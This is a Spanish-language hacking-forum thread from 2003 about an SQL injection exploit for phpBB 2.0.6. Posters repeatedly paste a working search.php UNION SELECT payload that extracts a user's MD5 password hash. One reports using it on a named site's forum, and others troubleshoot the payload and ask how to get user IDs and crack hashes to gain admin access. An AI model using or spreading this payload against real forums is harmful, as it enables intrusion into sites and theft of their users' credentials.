elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.


 


Tema destacado: [Aporte] Mejores practicas en Java


+  Foro de elhacker.net
|-+  Seguridad Informática
| |-+  Bugs y Exploits (Moderador: berz3k)
| | |-+  Exploit SQL Inject en PHPBB 2.0.6
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] 2 3 Ir Abajo Respuesta Imprimir
Autor Tema: Exploit SQL Inject en PHPBB 2.0.6  (Leído 14,149 veces)
Rojodos
Colaborador
***
Desconectado Desconectado

Mensajes: 3.535



Ver Perfil WWW
Exploit SQL Inject en PHPBB 2.0.6
« en: 29 Noviembre 2003, 09:44 »

http://www.security.nnov.ru/search/document.asp?docid=5467

Ya se aviso en seguridad que se parchearan los foros phpBB2...

De todas formas, es chungillo de usar y creo que hay modificarlo para que funcione bien (aparte del UID de usuario que keramos sacar el hash MD5 del pass...)

Salu2
En línea

-_-[S@BuEsOhAcK]-_-

Desconectado Desconectado

Mensajes: 279


No tenes nada mas interesante que leer que esto?


Ver Perfil
Re:Exploit SQL Inject en PHPBB 2.0.6
« Respuesta #1 en: 2 Diciembre 2003, 17:59 »

otro mas??? estos foros son una cagada... mejor yabbse
En línea

uh ah.. pone a franchela..

xD
-_-[S@BuEsOhAcK]-_-

Desconectado Desconectado

Mensajes: 279


No tenes nada mas interesante que leer que esto?


Ver Perfil
Re:Exploit SQL Inject en PHPBB 2.0.6
« Respuesta #2 en: 11 Diciembre 2003, 19:15 »

estuve tratando de hacerlo funcionar el exploit pero sin exito

esto hay:

Citar
Hello list,

Here is the exploit code for phpbb 2.06 sql injection described in
http://www.securityfocus.com/archive/1/345872 .
It will return MD5 password hash of specified user as [highlight] variable for viewtopic.php
in search results page.

http://site.com/search.php?search_id=1%20union%20select%20concat(char(97,58,55,58,123,115,58,49,52,58,34,115,101,97,114,99,104,95,114,101,115,117,108,116,115,34,59,115,58,49,58,34,49,34,59,115,58,49,55,58,34,116,111,116,97,108,95,109,97,116,99,104,95,99,111,117,110,116,34,59,105,58,53,59,115,58,49,50,58,34,115,112,108,105,116,95,115,101,97,114,99,104,34,59,97,58,49,58,123,105,58,48,59,115,58,51,50,58,34),user_password,char(34,59,125,115,58,55,58,34,115,111,114,116,95,98,121,34,59,105,58,48,59,115,58,56,58,34,115,111,114,116,95,100,105,114,34,59,115,58,52,58,34,68,69,83,67,34,59,115,58,49,50,58,34,115,104,111,119,95,114,101,115,117,108,116,115,34,59,115,58,54,58,34,116,111,112,105,99,115,34,59,115,58,49,50,58,34,114,101,116,117,114,110,95,99,104,97,114,115,34,59,105,58,50,48,48,59,125))%20from%20phpbb_users%20where%20user_id=[enter
uid]/*

en teoria lo unico que tengo que cambiar es el [enter
uid]

o algo mas???
En línea

uh ah.. pone a franchela..

xD
Rojodos
Colaborador
***
Desconectado Desconectado

Mensajes: 3.535



Ver Perfil WWW
Re:Exploit SQL Inject en PHPBB 2.0.6
« Respuesta #3 en: 12 Diciembre 2003, 01:59 »

Creo que solo el UID, pero no estoy seguro...

Este exploit yo no lo he investigado bien (ademas de que no domino con soltura el tema de los SQL injects y en general los SQL querys..)...

Creo que en el mismo advisory del exploit, se explicaba como se hacia...

Salu2
En línea

Bullhack

Desconectado Desconectado

Mensajes: 150



Ver Perfil
Re:Exploit SQL Inject en PHPBB 2.0.6
« Respuesta #4 en: 12 Diciembre 2003, 07:21 »

Yo lo e probao y si q me ha funcionao, weno me a dao el pass en MD5.

lo he hecho asi:

http://www.serverbulne.com/foro/search.php?search_id=1%20union%20select%20concat(char(97,58,55,58,123,115,58,49,52,58,34,115,101,97,114,99,104,95,114,101,115,117,108,116,115,34,59,115,58,49,58,34,49,34,59,115,58,49,55,58,34,116,111,116,97,108,95,109,97,116,99,104,95,99,111,117,110,116,34,59,105,58,53,59,115,58,49,50,58,34,115,112,108,105,116,95,115,101,97,114,99,104,34,59,97,58,49,58,123,105,58,48,59,115,58,51,50,58,34),user_password,char(34,59,125,115,58,55,58,34,115,111,114,116,95,98,121,34,59,105,58,48,59,115,58,56,58,34,115,111,114,116,95,100,105,114,34,59,115,58,52,58,34,68,69,83,67,34,59,115,58,49,50,58,34,115,104,111,119,95,114,101,115,117,108,116,115,34,59,115,58,54,58,34,116,111,112,105,99,115,34,59,115,58,49,50,58,34,114,101,116,117,114,110,95,99,104,97,114,115,34,59,105,58,50,48,48,59,125))%20from%20phpbb_users%20where%20user_id=[id]/*
En línea

EL_ZoRRo

Desconectado Desconectado

Mensajes: 234



Ver Perfil
Re:Exploit SQL Inject en PHPBB 2.0.6
« Respuesta #5 en: 12 Diciembre 2003, 09:12 »

Bueno yo lo prove el mismo dia que salio la falla y me funciono y obtube estas conclusiones


    

Exploit SQL Inject en PHPBB 2.0.6

Aqui esta:

Una manera simple de probar si el bug ha sido remendado es:

Código:
http://your_site/phpBB2/search.php?search_id=1\.
hxxp://your_site/search.php?search_id=1\
hxxp://your_site/phpbb2/search.php?search_id=1\
hxxp://your_site/phpbb2/search.php?search_id=1\
hxxp://your_site/foro/search.php?search_id=1\


esto dependera donde en que paht este el foro

Si fue remendado, éste debe devolver el mensaje "No topics or posts met your search criteria".

Si no ha sido parcheado, usted conseguirá un error de SQL

Exploit

Código:
http://site.com/search.php?search_id=1%20union%20select%20concat(char(97,58,55,58,123,115,58,49,52,58,34,115,101,97,114,99,104,95,114,101,115,117,108,116,115,34,59,115,58,49,58,34,49,34,59,115,58,49,55,58,34,116,111,116,97,108,95,109,97,116,99,104,95,99,111,117,110,116,34,59,105,58,53,59,115,58,49,50,58,34,115,112,108,105,116,95,115,101,97,114,99,104,34,59,97,58,49,58,123,105,58,48,59,115,58,51,50,58,34),user_password,char(34,59,125,115,58,55,58,34,115,111,114,116,95,98,121,34,59,105,58,48,59,115,58,56,58,34,115,111,114,116,95,100,105,114,34,59,115,58,52,58,34,68,69,83,67,34,59,115,58,49,50,58,34,115,104,111,119,95,114,101,115,117,108,116,115,34,59,115,58,54,58,34,116,111,112,105,99,115,34,59,115,58,49,50,58,34,114,101,116,117,114,110,95,99,104,97,114,115,34,59,105,58,50,48,48,59,125))%20from%20phpbb_users%20where%20user_id=[enter
uid]/
hxxp://your_site/phpBB2/exploit....
hxxp://your_site/phpbb2/exploit.....
hxxp://your_site/foro//expploit......


Como ya dije antes dependiendo del paht

Luego tiene solo que buscar los pass hasheados

Saludos
En línea

Kerber0

Desconectado Desconectado

Mensajes: 142

Yo me Amo!


Ver Perfil
Re:Exploit SQL Inject en PHPBB 2.0.6
« Respuesta #6 en: 12 Diciembre 2003, 09:56 »

Cómo saco el UID ??
En línea

-_-[S@BuEsOhAcK]-_-

Desconectado Desconectado

Mensajes: 279


No tenes nada mas interesante que leer que esto?


Ver Perfil
Re:Exploit SQL Inject en PHPBB 2.0.6
« Respuesta #7 en: 12 Diciembre 2003, 10:58 »

me devulve esto

Citar
DEBUG MODE

SQL Error : 1064 You have an error in your SQL syntax. Check the manual that corresponds to your MySQL server version for the right syntax to use near '[2]/* AND session_id = 'be27f28170606cac406d045cr00290c1

SELECT search_array FROM phpbb_search_results WHERE search_id = 1 union select concat(char(97,58,55,58,123,115,58,49,52,58,34,115,101,97,114,99,104,95,114,101,115,117,108,116,115,34,59,115,58,49,58,34,49,34,59,115,58,49,55,58,34,116,111,116,97,108,95,109,97,116,99,104,95,99,111,117,110,116,34,59,105,58,53,59,115,58,49,50,58,34,115,112,108,105,116,95,115,101,97,114,99,104,34,59,97,58,49,58,123,105,58,48,59,115,58,51,50,58,34),user_password,char(34,59,125,115,58,55,58,34,115,111,114,116,95,98,121,34,59,105,58,48,59,115,58,56,58,34,115,111,114,116,95,100,105,114,34,59,115,58,52,58,34,68,69,83,67,34,59,115,58,49,50,58,34,115,104,111,119,95,114,101,115,117,108,116,115,34,59,115,58,54,58,34,116,111,112,105,99,115,34,59,115,58,49,50,58,34,114,101,116,117,114,110,95,99,104,97,114,115,34,59,105,58,50,48,48,59,125)) from phpbb_users where user_id=[2]/* AND session_id = 'be27f28170606cac406d045cr00290c1'

Line : 693
File : /xxx/xxxx/xxxxx/xxx/search.php


be27f28170606cac406d045cr00290c1 es el pass md5????? y si asi fuera como lo descifro ya que no conozco ningun exploit que con insertar el md5 me arroje admin..
« Última modificación: 12 Diciembre 2003, 11:04 por -_-[S@BuEsOhAcK]-_- » En línea

uh ah.. pone a franchela..

xD
byebye


Desconectado Desconectado

Mensajes: 5.093



Ver Perfil
Re:Exploit SQL Inject en PHPBB 2.0.6
« Respuesta #8 en: 12 Diciembre 2003, 11:05 »

esque lo estas poniendo mal, pones where user_id=[2]/*  los corchetes no los pongas ([]).
En línea

-_-[S@BuEsOhAcK]-_-

Desconectado Desconectado

Mensajes: 279


No tenes nada mas interesante que leer que esto?


Ver Perfil
Re:Exploit SQL Inject en PHPBB 2.0.6
« Respuesta #9 en: 12 Diciembre 2003, 11:13 »

tenes razon no me di cuenta....
bueno lo puse como me dijistes pero me arrojo un resultado de busqueda de temas.. eso quiere decir que esta parcheado.. o no? .
pero de todas maneras como descifro el hash md5?
En línea

uh ah.. pone a franchela..

xD
Páginas: [1] 2 3 Ir Arriba Respuesta Imprimir 

Ir a:  

Mensajes similares
Asunto Iniciado por Respuestas Vistas Último mensaje
dll inject by c3r0x.. « 1 2 »
Programación C/C++
c3r0x 12 4,037 Último mensaje 2 Julio 2012, 19:24
por x64core
ASP - Oracle inject - Dudas y consejos.
Hacking Linux/Unix
icenteman 1 2,397 Último mensaje 10 Julio 2011, 09:36
por Cleantesdeasso
Alcanse con blind mssql inject , (comando shellcmd).
Nivel Web
ThePinkPanther 4 2,494 Último mensaje 4 Abril 2013, 21:35
por ThePinkPanther
Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines